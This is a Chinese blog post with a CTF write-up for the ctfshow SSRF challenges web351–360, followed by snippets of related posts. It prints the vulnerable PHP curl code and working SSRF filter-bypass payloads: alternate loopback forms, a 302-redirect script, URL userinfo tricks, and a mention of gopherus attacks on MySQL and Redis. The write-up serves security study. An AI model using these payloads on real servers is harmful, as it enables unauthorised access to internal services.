ctfshow (ssrf学习和实践)

最新推荐文章于 2023-11-19 21:06:45 发布
最新推荐文章于 2023-11-19 21:06:45 发布
阅读量333 收藏
点赞数
文章标签: web unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45766062/article/details/121549676
版权

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);//初始化一个cURL会话
curl_setopt($ch, CURLOPT_HEADER, 0);//curl_setopt函数的作用是为一个CURL会话设置选项
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);//执行一个cURL会话
curl_close($ch);//关闭一个cURL会话并且释放所有资源。
echo ($result);
?>

第一道题多说几句,在curl_init()函数中传参和在curl_setopt()函数中设置CURLOPT_URL,效果是一样的都是取回一个url地址。
这里尝试发现需要以本地用户访问:

payload:url=http://127.0.0.1/flag.php

web352

这里url的scheme必须为http或者https,并且不能有localhost和127.0.0.这里多说一下。php的parse_url()函数可以解析url:

<?php
$url="http://www.aaaaa.com/aaa";
$parse=parse_url($url);
print_r($parse);
/**
 *显示
 *Array
(
[scheme] => http
[host] => www.aaaaa.com
[path] => /aaa
)
 */

可以用0.0.0.0绕过:

url=http://0.0.0.0/flag.php

web353

和web252一样

web354

这里可以利用302跳转,在自己的vps上搭一个:

<?php 
header("Location: http://127.0.0.1/flag.php");

payload:url=http://xxxxxx/xx.php
当然y4师傅找到了一个http://sudo.cc/可以直接使用

web355

这道题需要host小于5,可以使用的包括省略0,或者只有0都行,因为0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0

url=http://127.1/flag.php```
url=http://0/flag.php

web356

同上

web357

这里需要用到302跳转,在354中已经提到了,那么为什么这里要进行302跳转呢?
因为这个:

filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)

具体的使用方法参考:地址

web358

正则表达试的意思就是url以ctf开头以show结尾

<?php
$url="http://ctf.@127.0.0.1/flag.php?show";
$parse=parse_url($url);
print_r($parse);
/**
 *显示
 * Array
(
[scheme] => http
[host] => 127.0.0.1
[user] => ctf.
[path] => /flag.php
[query] => show
)
 */

web359/web360

这两道题都需要使用到gopherus工具地址:地址
web359打MySQL:
在这里插入图片描述

web360打redis:
在这里插入图片描述

需要注意的是这里的payload在下划线之后都需再次进行url编码。

KKKKKento
关注
CTFshow SSRF(web351-360)
Kradress的博客
03-17 675
表示不允许私有IP地址(例如,10.0.0.0/8,172.16.0.0/12和192.168.0.0/16),而。后面要进行url编码,因为curl还会进行一次url解码。后面要进行url编码,因为curl还会进行一次url解码。显示网页内容,说明存在SSRF漏洞,那应该就是用。因为不能用私网,所以这题还是可以用。题目hint:打无密码的mysql。发现是一个登录框,抓个包看看,输入。,用于过滤和验证输入的IP地址。,这里可以用进制转换绕过。的返回结果,直接写马。的返回结果,直接写马。
ctfshow-ssrf
孤桜懶契
08-21 308
前言 记录web的题目wp,慢慢变强,铸剑。 SSRF SSRF(Server-Side Request Forgery: 服务器端请求第二天) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相关而与外部网隔离的内部系统) web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=cu
PHP FILTER_VALIDATE_IP 过滤器
weixin_34403693的博客
06-25 383
FILTER_VALIDATE_IP 过滤器把值作为 IP 进行验证,用于验证 IP 是否合法,支持 IPV6 验证 例子 <?php $ip = "192.168.0.1"; if(!filter_var($ip, FILTER_VALIDATE_IP)) { echo "IP is not valid"; } else { echo "IP is v...
ctfshow--ssrf
ing_end的博客
04-23 3932
SSRF概述及其危害 *SSRF概述 ​ 强制服务器发送一个攻击者的请求 ​ 互联网上的很多web应用提供了从其他服务器(也可以是本地)获取数据的功能。使用用户指定的URL,web应用可以获取图片(载入图片)、文件资源(下载或读取)。如下图所示,百度提供识图功能。如果链接可以访问任意请求,则存在ssrf漏洞 ​ 用户可以从本地或者URL的方式获取图片资源,交给百度识图处理。如果提交的是URL地址,该应用就会通过URL寻找图片资源。如果web 应用开放了类似于百度识图这样的功能,并且对用户提供的URL和远端
ctfshow ssrf篇
jie_a的博客
07-03 412
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) web351-353 前两个无过滤 url=http://127.0.0.1/flag.php 第三个 payload:url=http://0x7F000001/flag.php 也可以用地址转换进制 转换 web354 Y4师傅
CTFSHOW-SSRF
灰太的表格的博客
01-25 192
CTFSHOW SSRF 351-360 351 url=file:var/www/html/flag.php直接读取就好 352 url=http://127.1.1.1:80/flag.php 过滤了locahost和127.0.0.1.服务器要是linux的话用零也可以绕过。 353 url=http://0x7F.0.0.1/flag.php,直接转个进制绕下 354 url=http://域名/flag.php 用自己的域名解析多加个127.0.0.1,自己没的话去ceye.io注册再绑定127.
ctfshow SSRF专题
会下雪的晴天
01-02 927
title: ctfshow SSRF专题 date: 2020-12-30 11:49:30 categories: ctfshow 新博客地址:https://yq1ng.github.io/ 随缘更 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) web351 web.
ctfshow ssrf
08-16
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞,通过利用服务器端请求功能,攻击者可以发送来自目标服务器的请求。在CTF比赛中,SSRF通常用于获取敏感信息或攻击内部系统。 在引用中提到了...
ctfshow 红包题第九弹 ssrf
qq_40327508的博客
11-25 1041
通过抓包登陆界面,发现存在ssrf漏洞 在通过ps猜测是ssrf打mysql 使用gopherus工具生成ssrf打mysql 的payload 之后放到burp中把参数在url编码一次 查看是否成功写入文件 成功写入,使用蚁剑连接
ctfshow web入门ssrf
xiaolong22333的博客
04-28 961
其实刚接触时做过一遍,现在再做一遍巩固一下知识点 文章目录web351web352web353web354web355web356web357 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1.
SSRF基础以及ctf.show的SSRF(web351-web360)
wanan的博客
09-30 573
SSRF基础以及ctf.show的SSRF(web351-web360)
ctfshow SSRF web351~360
shinygod的博客
09-25 1310
SSRF练习和学习
CTFshow——SSRF
D.MIND 的博客
02-25 1052
文章目录web351——web352、353——黑名单过滤web354——DNS-Rebinding攻击绕过web355—— web351—— <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $resul
ctfshow—web入门—SSRF
最新发布
m0_74013288的博客
11-19 202
没有过滤,使用file协议读取本地文件。通过post提交。
CTFshow web入门 SSRF
Lum1n0us's Blog
07-17 501
web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 第一题,啥也没
CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结
Love&Share
09-28 6110
SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 相关函数和类 file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中 readfile():输出一个文件的内容 fsockopen():打开一个网络连接或者一个Unix 套接字连接
ctfshow web入门-ssrf
akxnxbshai的博客
05-13 761
目录 开头: web 351 web 352 web 353 web 354 web 355 web 356 web 357 Web 358 Web 359 Web 360 开头: 简单了解一下SSRF。 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统
【CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 1165
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值